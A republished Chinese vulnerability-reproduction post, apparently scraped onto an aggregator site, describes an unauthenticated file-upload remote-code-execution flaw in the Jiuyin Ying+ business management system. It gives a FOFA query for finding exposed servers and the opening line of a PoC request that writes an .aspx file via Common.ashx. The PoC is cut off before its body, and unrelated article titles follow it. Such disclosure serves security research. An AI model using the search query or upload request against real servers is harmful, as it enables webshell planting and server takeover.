当前位置: 首页 > news >正文

九垠赢+商业管理系统 Common.ashx 文件上传致RCE漏洞复现

0x01 产品简介

九垠赢+商业管理系统是基于互联网技术的进销存管理软件,适用于新零售背景下各种业态的线上线下一体化的商超经营管理。赢+ERP以商业管理系统为底座,融合了多种软、硬件解决方案,实现了从企业、供应商、三方平台到顾客等日常管理的全线数字化、智能化和移动化,是一套庞大的全场景、全链路、全渠道管理中台系统。同时,融合了先进的经营理念,借助系统对企业业务流程进行科学的设计和优化,使企业管理逐步进入规范、高效的运行轨道,从根本上降低企业运营成本,提高企业经营效益。

0x02 漏洞概述

九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

body="九垠赢+"

0x04 漏洞复现

PoC

POST /System/Common.ashx?type=savefile&path=rce.aspx H
http://www.lryc.cn/news/512875.html

相关文章:

  • 速盾:服务器CDN加速解析的好处有哪些呢?
  • C++ 设计模式:备忘录模式(Memento Pattern)
  • Android 系统 Activity 系统层深度定制的方法、常见问题以及解决办法
  • PDF怎么压缩得又小又清晰?5种PDF压缩方法
  • YK人工智能(三)——万字长文学会torch深度学习
  • 关于CISP报名费用详情
  • vim 按下esc后取消高亮
  • SwiftUI:多语言实现富文本插值
  • 操作系统基础
  • 函数调用流程可用工具
  • UniApp 页面布局基础
  • 2D图像测量到3D点云之物体三维尺寸测量!!!!
  • [TOTP]android kotlin实现 totp身份验证器 类似Google身份验证器
  • 2025决战智驾:从中阶卷到L3,车企需要抓好一个数据闭环
  • 电子电气架构 --- 汽车电子电器设计概述
  • SpringAI从入门到熟练
  • [算法] [leetcode-20] 有效的括号
  • R语言入门笔记:第一节,快速了解R语言——文件与基础操作
  • 【亚马逊云】基于Amazon EC2实例部署 NextCloud 云网盘并使用 Docker-compose 搭建 ONLYOFFICE 企业在线办公应用软件
  • java Redisson 实现限流每秒/分钟/小时限制N个
  • 【漫话机器学习系列】029.累积分布函数(Cumulative Distribution Function)
  • 设计模式之访问者模式:一楼千面 各有玄机
  • AI 编程的世界:用Cursor编写评分项目
  • Cesium教程(二十三):Cesium实现下雨场景
  • SpringCloudAlibaba技术栈-Higress
  • uniapp 微信小程序开发使用高德地图、腾讯地图
  • Springboot:后端接收数组形式参数
  • Postman[2] 入门——界面介绍
  • 1月第四讲:Java Web学生自习管理系统
  • 【Redis】Redis 典型应用 - 缓存 (cache)